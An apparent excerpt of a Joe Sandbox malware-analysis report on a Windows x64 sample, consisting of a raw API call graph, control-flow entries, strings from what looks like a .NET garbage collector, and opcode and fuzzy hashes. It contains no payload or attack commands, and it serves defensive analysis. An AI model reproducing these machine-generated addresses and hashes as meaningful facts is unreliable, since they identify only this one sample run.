7ff72f5b0e80 29633->29634 29634->29632 29634->29636 29645 7ff72f60acf0 8 API calls 29636->29645 29637 7ff72f5b0ff8 29637->29594 29638->29612 29639->29600 29640->29604 29641->29607 29642->29614 29643->29583 29644->29586 29645->29637 29646->29464 29648 7ff72f5abaaf 29647->29648 29649 7ff72f5abab5 SetThreadPriority ResumeThread CloseHandle 29647->29649 29648->29466 29649->29466 29651 7ff72f5b4203 29650->29651 29655 7ff72f5b4229 29651->29655 29656 7ff72f5b5180 29651->29656 29653 7ff72f5b4220 29654 7ff72f5ac8a0 InitializeCriticalSectionEx 29653->29654 29653->29655 29654->29655 29655->29472 29655->29655 29657 7ff72f5b17b0 3 API calls 29656->29657 29658 7ff72f5b51a2 29657->29658 29659 7ff72f5b51aa 29658->29659 29660 7ff72f5b16e0 3 API calls 29658->29660 29659->29653 29661 7ff72f5b51c8 29660->29661 29664 7ff72f5b51d3 29661->29664 29665 7ff72f5b1790 VirtualFree 29661->29665 29663 7ff72f5b52ee 29663->29653 29664->29653 29665->29663 29666->29241 30394 7ff72f5a3540 6 API calls 29728 7ff72f632f50 29729 7ff72f632f94 29728->29729 29730 7ff72f632fd6 GetCalendarInfoEx 29729->29730 29731 7ff72f632ff5 29730->29731 29733 7ff72f63301d 29731->29733 29734 7ff72f624160 29731->29734 29735 7ff72f62416b 29734->29735 29736 7ff72f6241c6 29734->29736 29735->29736 29737 7ff72f62417b 29735->29737 29738 7ff72f5a1fc0 71 API calls 29736->29738 29739 7ff72f624180 29737->29739 29741 7ff72f624197 29737->29741 29742 7ff72f624213 29737->29742 29740 7ff72f6241f1 29738->29740 29739->29733 29746 7ff72f5a2540 26 API calls 29740->29746 29775 7ff72f5a2080 29741->29775 29764 7ff72f5a1fc0 29742->29764 29745 7ff72f6241a6 29745->29733 29746->29742 29747 7ff72f62421f 29769 7ff72f5a2540 29747->29769 29749 7ff72f62425d 29749->29733 29750 7ff72f624241 29750->29749 29751 7ff72f6243bd 29750->29751 29752 7ff72f624323 29750->29752 29754 7ff72f5a1fc0 71 API calls 29751->29754 29753 7ff72f5a2080 85 API calls 29752->29753 29755 7ff72f624331 29753->29755 29758 7ff72f6243c9 29754->29758 29756 7ff72f624377 MultiByteToWideChar 
29755->29756 29757 7ff72f624398 29756->29757 29757->29749 29760 7ff72f5a1fc0 71 API calls 29757->29760 29759 7ff72f5a2540 26 API calls 29758->29759 29759->29757 29761 7ff72f6243f0 29760->29761 29762 7ff72f5a2540 26 API calls 29761->29762 29763 7ff72f62440b 29762->29763 29765 7ff72f5a1ff2 29764->29765 29766 7ff72f5a1feb 29764->29766 29785 7ff72f5ac700 29765->29785 29766->29747 29768 7ff72f5a2044 29768->29747 29770 7ff72f5a25fb 29769->29770 29862 7ff72f653e60 26 API calls 29770->29862 29776 7ff72f5a2089 29775->29776 29779 7ff72f5a20d5 29775->29779 29777 7ff72f5a20c8 29776->29777 29778 7ff72f5ac700 71 API calls 29776->29778 29777->29745 29778->29779 29780 7ff72f5a218c 29779->29780 29781 7ff72f5a2540 26 API calls 29779->29781 29780->29745 29782 7ff72f653d80 29781->29782 29863 7ff72f653f20 26 API calls 29782->29863 29784 7ff72f653e47 29786 7ff72f5ac746 29785->29786 29787 7ff72f5ac786 29786->29787 29790 7ff72f5b759b 29786->29790 29810 7ff72f5b74ab 29786->29810 29787->29768 29791 7ff72f5b75bc 29790->29791 29792 7ff72f5b75ce 29791->29792 29829 7ff72f5c3910 39 API calls 29791->29829 29795 7ff72f5b7625 29792->29795 29796 7ff72f5b75fe GetTickCount64 29792->29796 29804 7ff72f5b76a7 29792->29804 29794 7ff72f5b7637 29818 7ff72f5e2520 29794->29818 29795->29794 29830 7ff72f5c3910 39 API calls 29795->29830 29796->29795 29800 7ff72f5b7612 29796->29800 29800->29804 29801 7ff72f5b76e3 29802 7ff72f5b7570 29801->29802 29803 7ff72f5b74fa 29801->29803 29806 7ff72f5b7709 29801->29806 29828 7ff72f5e25f0 WaitForSingleObject 29802->29828 29803->29787 29804->29802 29831 7ff72f5bd810 59 API calls 29804->29831 29806->29803 29832 7ff72f5ba000 SleepEx SwitchToThread DebugBreak 29806->29832 29807 7ff72f5b7649 29807->29802 29807->29804 29808 7ff72f5b7683 GetTickCount64 29807->29808 29808->29800 29808->29804 29811 7ff72f5b7516 29810->29811 29812 7ff72f5b74ec 29810->29812 29835 7ff72f5bd150 29811->29835 29814 7ff72f5b74f5 DebugBreak 29812->29814 29815 7ff72f5b74fa 29812->29815 29814->29815 
29815->29787 29819 7ff72f5e2540 29818->29819 29820 7ff72f5e25da 29818->29820 29821 7ff72f5b0e30 10 API calls 29819->29821 29820->29807 29822 7ff72f5e2567 29821->29822 29823 7ff72f5e25ca 29822->29823 29833 7ff72f5b7060 WaitForSingleObject 29822->29833 29823->29807 29825 7ff72f5e259e 29826 7ff72f5e25b1 29825->29826 29834 7ff72f5cadc0 SleepEx SwitchToThread SwitchToThread 29825->29834 29826->29807 29828->29802 29829->29792 29830->29794 29831->29801 29832->29803 29833->29825 29834->29826 29838 7ff72f5bd182 29835->29838 29839 7ff72f5d6690 GetTickCount64 29838->29839 29841 7ff72f5b7539 29838->29841 29843 7ff72f5e2520 14 API calls 29838->29843 29844 7ff72f5c3910 39 API calls 29838->29844 29846 7ff72f5bde60 29838->29846 29857 7ff72f5e25f0 WaitForSingleObject 29838->29857 29858 7ff72f5cadc0 SleepEx SwitchToThread SwitchToThread 29838->29858 29859 7ff72f5bd810 59 API calls 29838->29859 29839->29838 29841->29815 29845 7ff72f5ba000 SleepEx SwitchToThread DebugBreak 29841->29845 29843->29838 29844->29838 29845->29815 29847 7ff72f5bde9c 29846->29847 29850 7ff72f5bdf48 29846->29850 29848 7ff72f5bdf5a 29847->29848 29849 7ff72f5bdf09 29847->29849 29848->29850 29861 7ff72f5b7060 WaitForSingleObject 29848->29861 29853 7ff72f5bdf18 SwitchToThread 29849->29853 29851 7ff72f5e0720 18 API calls 29850->29851 29856 7ff72f5bdf50 29850->29856 29851->29850 29854 7ff72f5bdf26 29853->29854 29854->29850 29860 7ff72f5cadc0 SleepEx SwitchToThread SwitchToThread 29854->29860 29856->29838 29857->29838 29858->29838 29859->29838 29860->29850 29861->29854 29863->29784 30284 7ff72f5a2450 26 API calls 30356 7ff72f5d6e53 40 API calls 30357 7ff72f5a5650 GetLastError SetLastError RtlRestoreContext 30319 7ff72f5e3f50 9 API calls 30395 7ff72f65ad40 87 API calls 30321 7ff72f5a4720 6 API calls 30286 7ff72f5b6820 SleepEx SwitchToThread 30322 7ff72f5b7f20 GetCurrentThreadId malloc RtlPcToFileHeader RaiseException 30360 7ff72f5b6a20 SleepEx WaitForSingleObject SwitchToThread SwitchToThread SwitchToThread 30396 
7ff72f5aa520 9 API calls 30288 7ff72f60ac2c GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 29959 7ff72f5e031b 29960 7ff72f5e032c 29959->29960 29961 7ff72f5e035a 29960->29961 29963 7ff72f5b8808 29960->29963 29964 7ff72f5b880d 29963->29964 29981 7ff72f5cad30 29964->29981 29967 7ff72f5b884d 29985 7ff72f5b1630 QueryPerformanceCounter 29967->29985 29970 7ff72f5b886e 29986 7ff72f5ac650 29970->29986 29972 7ff72f5b88be 29973 7ff72f5de8c0 52 API calls 29972->29973 29976 7ff72f5b88c3 29973->29976 29974 7ff72f5b89cd 29975 7ff72f5cad30 SwitchToThread 29974->29975 29977 7ff72f5b8a55 29975->29977 29976->29974 29978 7ff72f5b1630 QueryPerformanceCounter 29976->29978 29979 7ff72f5b1680 SetEvent 29977->29979 29980 7ff72f5b8a78 29977->29980 29978->29974 29979->29980 29980->29961 29982 7ff72f5b882f 29981->29982 29983 7ff72f5cad4f 29981->29983 29982->29967 29990 7ff72f5b1670 ResetEvent 29982->29990 29983->29982 29984 7ff72f5cad91 SwitchToThread 29983->29984 29984->29983 29985->29970 29987 7ff72f5ac65d 29986->29987 29991 7ff72f5a3260 15 API calls 29987->29991 29989 7ff72f5ac6c4 29991->29989 30361 7ff72f5bde1b 23 API calls 30026 7ff72f5cd233 30027 7ff72f5cd23d 30026->30027 30066 7ff72f5c3b10 30027->30066 30029 7ff72f5cd3f2 30034 7ff72f5cd2c9 30029->30034 30101 7ff72f5c6190 10 API calls 30029->30101 30030 7ff72f5cd2bd 30100 7ff72f5b1630 QueryPerformanceCounter 30030->30100 30035 7ff72f5cd675 30034->30035 30036 7ff72f5cd66a 30034->30036 30041 7ff72f5cd673 30034->30041 30035->30041 30103 7ff72f5b1670 ResetEvent 30035->30103 30102 7ff72f5c3910 39 API calls 30036->30102 30041->30041 30070 7ff72f5c7e30 30041->30070 30045 7ff72f5cd909 30052 7ff72f5cd95f 30045->30052 30106 7ff72f5e1200 28 API calls 30045->30106 30047 7ff72f5cd8ff 30050 7ff72f5ac650 15 API calls 30047->30050 30048 7ff72f5cda41 30088 7ff72f5c8830 30048->30088 30050->30045 30051 7ff72f5cdcf1 30055 7ff72f5cdda5 30051->30055 30110 7ff72f5ca330 30051->30110 30052->30048 30052->30051 30107 
7ff72f5dd0e0 EnterCriticalSection LeaveCriticalSection 30052->30107 30056 7ff72f5cd883 SwitchToThread 30057 7ff72f5cd74b 30056->30057 30057->30045 30057->30047 30057->30052 30057->30056 30059 7ff72f5cd8af SwitchToThread 30057->30059 30061 7ff72f5cd877 SwitchToThread 30057->30061 30104 7ff72f5b1690 SleepEx 30057->30104 30105 7ff72f5e25f0 WaitForSingleObject 30057->30105 30059->30057 30061->30057 30063 7ff72f5cda4d 30108 7ff72f5b1630 QueryPerformanceCounter 30063->30108 30064 7ff72f5cdbad 30109 7ff72f5c9a50 15 API calls 30064->30109 30067 7ff72f5c3b8b 30066->30067 30068 7ff72f5c3b1d 30066->30068 30067->30029 30067->30030 30068->30067 30069 7ff72f5c3b6e DebugBreak 30068->30069 30069->30068 30071 7ff72f5c7e41 30070->30071 30076 7ff72f5c7f54 30070->30076 30072 7ff72f5b0130 4 API calls 30071->30072 30075 7ff72f5c7e5c 30072->30075 30073 7ff72f5c7eb4 30074 7ff72f5c7f04 30073->30074 30077 7ff72f5b0130 4 API calls 30073->30077 30074->30076 30079 7ff72f5b0130 4 API calls 30074->30079 30075->30073 30078 7ff72f5b0130 4 API calls 30075->30078 30080 7ff72f5e20b0 30076->30080 30077->30073 30078->30075 30079->30074 30082 7ff72f5e20b9 30080->30082 30081 7ff72f5e224d 30081->30057 30082->30081 30083 7ff72f5e2137 DebugBreak 30082->30083 30085 7ff72f5e2146 30082->30085 30083->30085 30084 7ff72f5e21b7 DebugBreak 30087 7ff72f5e21c6 30084->30087 30085->30084 30085->30087 30086 7ff72f5e223a DebugBreak 30086->30081 30087->30081 30087->30086 30089 7ff72f5c885a 30088->30089 30091 7ff72f5c8888 30089->30091 30098 7ff72f5c8a76 30089->30098 30090 7ff72f5c8a71 30131 7ff72f60acf0 8 API calls 30090->30131 30095 7ff72f5c891b 30091->30095 30123 7ff72f5c7a30 30091->30123 30094 7ff72f5c9954 30094->30063 30095->30090 30097 7ff72f5c89e5 EnterCriticalSection LeaveCriticalSection 30095->30097 30130 7ff72f5b1770 VirtualFree 30095->30130 30097->30095 30098->30090 30118 7ff72f5c7be0 30098->30118 30100->30034 30101->30029 30102->30041 30104->30057 30105->30057 30106->30052 30107->30052 30108->30064 30109->30051 
30111 7ff72f5ca33f 30110->30111 30112 7ff72f5ca37a 30110->30112 30113 7ff72f5b0130 4 API calls 30111->30113 30142 7ff72f5b6ee0 QueryPerformanceCounter 30112->30142 30113->30112 30115 7ff72f5ca3cb 30143 7ff72f5cc0c0 8 API calls 30115->30143 30117 7ff72f5ca3d0 30117->30055 30119 7ff72f5c7bf4 30118->30119 30120 7ff72f5c7bed 30118->30120 30121 7ff72f5c7c69 30119->30121 30122 7ff72f5c7a30 5 API calls 30119->30122 30120->30090 30121->30090 30122->30119 30132 7ff72f5e2480 30123->30132 30125 7ff72f5c7a69 30126 7ff72f5c7b69 30125->30126 30140 7ff72f5b1770 VirtualFree 30125->30140 30126->30091 30128 7ff72f5c7b2e 30128->30126 30129 7ff72f5c7b3c EnterCriticalSection LeaveCriticalSection 30128->30129 30129->30126 30130->30095 30131->30094 30133 7ff72f5e249a 30132->30133 30135 7ff72f5e24a3 30133->30135 30141 7ff72f5b1770 VirtualFree 30133->30141 30136 7ff72f5e24f3 30135->30136 30137 7ff72f5e24bd EnterCriticalSection 30135->30137 30136->30125 30138 7ff72f5e24e0 30137->30138 30139 7ff72f5e24e7 LeaveCriticalSection 30137->30139 30138->30139 30139->30136 30140->30128 30141->30135 30142->30115 30143->30117 30290 7ff72f5a7430 GetCurrentProcess FlushInstructionCache VirtualProtect 30362 7ff72f5a4230 8 API calls 30397 7ff72f5a3930 17 API calls 30291 7ff72f5b6830 QueryPerformanceCounter 30260 7ff72f65e620 30261 7ff72f5a54e0 16 API calls 30260->30261 30262 7ff72f65e640 30261->30262 30273 7ff72f5a4340 malloc RtlPcToFileHeader RaiseException 30262->30273 30264 7ff72f65e648 30274 7ff72f65e7e0 85 API calls 30264->30274 30266 7ff72f65e666 30275 7ff72f5a20e0 85 API calls 30266->30275 30268 7ff72f65e678 30269 7ff72f65e69b 30268->30269 30276 7ff72f65e990 85 API calls 30268->30276 30277 7ff72f652fa0 85 API calls 30269->30277 30272 7ff72f65e6a8 30273->30264 30274->30266 30275->30268 30276->30268 30277->30272 30365 7ff72f5bab10 DebugBreak DebugBreak 30292 7ff72f5b6910 15 API calls 30293 7ff72f5b7910 SetEvent 30401 7ff72f5a1a08 85 API calls 30402 7ff72f633a00 96 API calls 30295 7ff72f65f100 88 API 
calls 30331 7ff72f5a53e0 WaitForMultipleObjectsEx SetLastError CoWaitForMultipleHandles SetLastError 30372 7ff72f5b42e0 GetCurrentThreadId SleepEx malloc RtlPcToFileHeader RaiseException 30297 7ff72f5bd8d0 59 API calls 30298 7ff72f5c4cd9 VirtualAlloc VirtualUnlock 29999 7ff72f5d88d9 30002 7ff72f5d88d0 29999->30002 30002->29999 30003 7ff72f5d7c37 30002->30003 30007 7ff72f5bc630 30002->30007 30021 7ff72f5bbff0 13 API calls 30002->30021 30006 7ff72f5cf120 34 API calls 30003->30006 30019 7ff72f5df280 VirtualAlloc VirtualUnlock 30003->30019 30020 7ff72f5cf280 38 API calls 30003->30020 30006->30003 30012 7ff72f5bc65e 30007->30012 30008 7ff72f5bca61 30009 7ff72f5bc9eb 30008->30009 30013 7ff72f5cf900 11 API calls 30008->30013 30014 7ff72f5bcb9c 30008->30014 30024 7ff72f5bb5c0 VirtualAlloc VirtualUnlock 30008->30024 30009->30002 30012->30008 30012->30009 30015 7ff72f5bc9f7 30012->30015 30017 7ff72f5bc96f 30012->30017 30013->30008 30025 7ff72f5bb5c0 VirtualAlloc VirtualUnlock 30014->30025 30023 7ff72f5bb5c0 VirtualAlloc VirtualUnlock 30015->30023 30022 7ff72f5bb5c0 VirtualAlloc VirtualUnlock 30017->30022 30019->30003 30020->30003 30021->30002 30022->30009 30023->30009 30024->30008 30025->30009 30403 7ff72f5bd9ea SleepEx WaitForSingleObject SwitchToThread SwitchToThread 30300 7ff72f5bdf50 45 API calls 30332 7ff72f65fbe0 LocaleNameToLCID 30405 7ff72f5d99c3 52 API calls 29667 7ff72f5bdfbf 29672 7ff72f5e0720 29667->29672 29669 7ff72f5bdf97 29670 7ff72f5e0720 18 API calls 29669->29670 29671 7ff72f5be085 29669->29671 29670->29669 29677 7ff72f5badf0 29672->29677 29674 7ff72f5e081c 29674->29669 29675 7ff72f5e0758 29675->29674 29688 7ff72f5bb250 29675->29688 29678 7ff72f5bae39 29677->29678 29686 7ff72f5baf10 29678->29686 29701 7ff72f5e0570 SwitchToThread SwitchToThread SwitchToThread SwitchToThread 29678->29701 29681 7ff72f5bb122 29682 7ff72f5bb1a0 29681->29682 29683 7ff72f5bb1e9 29681->29683 29703 7ff72f5c29c0 6 API calls 29682->29703 29704 7ff72f5bb750 VirtualAlloc VirtualUnlock 
DebugBreak 29683->29704 29686->29675 29687 7ff72f5baf49 29687->29681 29702 7ff72f5d3410 VirtualAlloc VirtualUnlock 29687->29702 29690 7ff72f5bb2d8 29688->29690 29689 7ff72f5bb46d 29689->29675 29690->29689 29692 7ff72f5bb2dd 29690->29692 29705 7ff72f5cf900 29690->29705 29691 7ff72f5bb405 29695 7ff72f5bb432 29691->29695 29696 7ff72f5bb477 29691->29696 29692->29689 29692->29691 29713 7ff72f5e0570 SwitchToThread SwitchToThread SwitchToThread SwitchToThread 29692->29713 29715 7ff72f5c29c0 6 API calls 29695->29715 29716 7ff72f5bb750 VirtualAlloc VirtualUnlock DebugBreak 29696->29716 29697 7ff72f5bb3da 29697->29691 29714 7ff72f5d3410 VirtualAlloc VirtualUnlock 29697->29714 29701->29687 29702->29681 29703->29686 29704->29686 29706 7ff72f5cf916 29705->29706 29707 7ff72f5cf9b0 29706->29707 29708 7ff72f5b0130 4 API calls 29706->29708 29711 7ff72f5cf947 29706->29711 29717 7ff72f5e2320 29707->29717 29708->29707 29711->29692 29712 7ff72f5b0130 4 API calls 29712->29711 29713->29697 29714->29691 29715->29689 29716->29689 29718 7ff72f5e2359 EnterCriticalSection 29717->29718 29719 7ff72f5e23e5 29717->29719 29722 7ff72f5e2379 LeaveCriticalSection 29718->29722 29720 7ff72f5b16e0 3 API calls 29719->29720 29723 7ff72f5cf9d9 29719->29723 29724 7ff72f5e2413 29720->29724 29722->29719 29723->29711 29723->29712 29724->29723 29725 7ff72f5e2424 EnterCriticalSection 29724->29725 29726 7ff72f5e2443 29725->29726 29727 7ff72f5e244a LeaveCriticalSection 29725->29727 29726->29727 29727->29723 30374 7ff72f5a4ec3 25 API calls 30333 7ff72f5bdf97 18 API calls 29864 7ff72f6530d0 29865 7ff72f6530e1 29864->29865 29866 7ff72f6530ea 29864->29866 29867 7ff72f653105 29866->29867 29869 7ff72f653050 29866->29869 29870 7ff72f653069 29869->29870 29873 7ff72f653160 29870->29873 29872 7ff72f653079 29872->29867 29874 7ff72f653177 29873->29874 29876 7ff72f6531ea 29873->29876 29878 7ff72f653220 26 API calls 29874->29878 29876->29872 29877 7ff72f65318b 29877->29872 29878->29877 29879 7ff72f5b08d0 29880 7ff72f5b08ea 
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
• Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: BreakDebug
                                                                                                                                                                                                                                                                                  • String ID: @=}$END
                                                                                                                                                                                                                                                                                  • API String ID: 456121617-646646346
                                                                                                                                                                                                                                                                                  • Opcode ID: 32de57e1a6750bfde0c47b7a68c88ed3004110d39829c2a4e75dfd4f32f0a8f4
                                                                                                                                                                                                                                                                                  • Instruction ID: 6557f52ed3c7e35ec8c2801874b6cc58e644ace57220d8e85378f5b02775f2ce
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32de57e1a6750bfde0c47b7a68c88ed3004110d39829c2a4e75dfd4f32f0a8f4
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9825B79F09AC686FA54AF1AAC502F4B3A0EF59B54FD44136D95E823A1DF3CA441CE30

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72F5AB84A), ref: 00007FF72F5B146F
                                                                                                                                                                                                                                                                                  • GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF72F5AB84A), ref: 00007FF72F5B14AD
                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72F5AB84A), ref: 00007FF72F5B14D9
                                                                                                                                                                                                                                                                                  • GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF72F5AB84A), ref: 00007FF72F5B14EA
                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72F5AB84A), ref: 00007FF72F5B14F9
                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72F5AB84A), ref: 00007FF72F5B1590
                                                                                                                                                                                                                                                                                  • GetProcessAffinityMask.KERNEL32 ref: 00007FF72F5B15A3
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 580471860-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 03dbf51e9477a4b2f0782d4ffae03c46400fccc10c807166d3160a18ce5dc755
                                                                                                                                                                                                                                                                                  • Instruction ID: 74f78f1b7fb51badc3dab34441f460823529c278259242064ab3e54eb0383628
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 03dbf51e9477a4b2f0782d4ffae03c46400fccc10c807166d3160a18ce5dc755
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7514C75B1C78687EA40AF16EC405E9A3A1FB48780FC44032D98E4B7A9DE3DE504CF20
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 6f93bc1d4941456f45dda91854c7f695a82bcce70b9b063c41ad38af2987899c
                                                                                                                                                                                                                                                                                  • Instruction ID: 4a3f7e61b6d001a35b182e6b4a3cbba71fbf8e01f52abb2f150722fc849e9a52
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f93bc1d4941456f45dda91854c7f695a82bcce70b9b063c41ad38af2987899c
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1CB24C76B09BC686EA40AF15EC802B9B7A4FB48B44FE4453AC94E17765DF3CE451CB20
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: @=}$d
                                                                                                                                                                                                                                                                                  • API String ID: 0-4053520297
                                                                                                                                                                                                                                                                                  • Opcode ID: 097b62bcefa2e15c075ed7cd1fc2a7246b24135ed2dc7981fe42efd19a6c3ad6
                                                                                                                                                                                                                                                                                  • Instruction ID: f5c8a394293efc6a2e8d26873253c7ca69139c00015f7d446bcfac8e877292a9
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 097b62bcefa2e15c075ed7cd1fc2a7246b24135ed2dc7981fe42efd19a6c3ad6
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A62AC65B186C687FA65AF26AC413B9F6A1FF59780FD09135D90E53350EF3CA881CA30

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
• Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: GlobalMemoryProcessQueryStatus$CurrentFrequencyInformationObjectPerformance
                                                                                                                                                                                                                                                                                  • String ID: Creation of WaitForGCEvent failed$TraceGC is not turned on
                                                                                                                                                                                                                                                                                  • API String ID: 133006248-518909315
                                                                                                                                                                                                                                                                                  • Opcode ID: 3f99d9c4068ce16fac88113a0baf40306a504a41c0001bff05d2c2920de71d5b
                                                                                                                                                                                                                                                                                  • Instruction ID: 3c3bb98f11a32c88161a72c884838f6b7be0bb30a1cb2ba44a57b77da1928d3a
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f99d9c4068ce16fac88113a0baf40306a504a41c0001bff05d2c2920de71d5b
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EDB17A25F0DBC282FA55BB26EC612FAE291EF59784FD40135E54E0679ADF2CB0418B70
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                                  • Opcode ID: ecc120c17447902b84dd65978579eb4ee08e6082c242e837b02859beb14b59ee
                                                                                                                                                                                                                                                                                  • Instruction ID: a25cc48f152f51fd0ec1ed7635dada4dc9258f79d81d6b51e4bde3ce49e9318e
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ecc120c17447902b84dd65978579eb4ee08e6082c242e837b02859beb14b59ee
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB219833B05A809AE724EF61EC109E977A5FB58798F900136FE4E83A49DF38C491CB50
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: f905b1f908e65b5aba95cf85111788d4451240a2511b24a2e32d8eb1b4069d57
                                                                                                                                                                                                                                                                                  • Instruction ID: c1eef9ab636d53de4eb6ac5d5013c03795574541e35687f84ae3a0a5987267dd
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f905b1f908e65b5aba95cf85111788d4451240a2511b24a2e32d8eb1b4069d57
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2682D032B0A78586EB10AF66EC406B9B7A5FB48B94F944136DE6D53B94CF3CE441CB10
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2050909247-0
                                                                                                                                                                                                                                                                                  • Opcode ID: bdf8833cee21c139ef57a5bee3b8c50e71db7ac1327d835877ec4aba224b51aa
                                                                                                                                                                                                                                                                                  • Instruction ID: 4e415a14b3858e203e0d10bdac1b79f9bcf2ce029f7e366593ae58ce2f783f65
